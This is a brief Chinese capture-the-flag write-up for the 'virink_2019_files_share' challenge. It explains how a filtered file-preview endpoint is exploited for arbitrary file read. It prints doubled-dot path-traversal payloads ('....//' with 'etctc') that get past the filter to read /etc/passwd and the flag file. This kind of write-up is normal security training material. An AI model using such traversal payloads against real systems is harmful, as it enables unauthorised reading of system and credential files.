virink_2019_files_share

进入环境

发现无法查看源码

在url前添加view-source:

看到有upload和static两个路径

访问upload路径

点击Preview直接就下载内容了,这里就直接抓包

发现直接就读取了内容,可能存在任意文件读取

其中/etc/passwd变成了\/epasswd

这里存在过滤

试着双写

....//....//....//....//....//....//....//....//....//....//etctc//passwd

根据前面的hint读取flag

....//....//....//....//....//....//....//....//....//....//f1ag_Is_h3re..//flag

发表评论

您的电子邮箱地址不会被公开。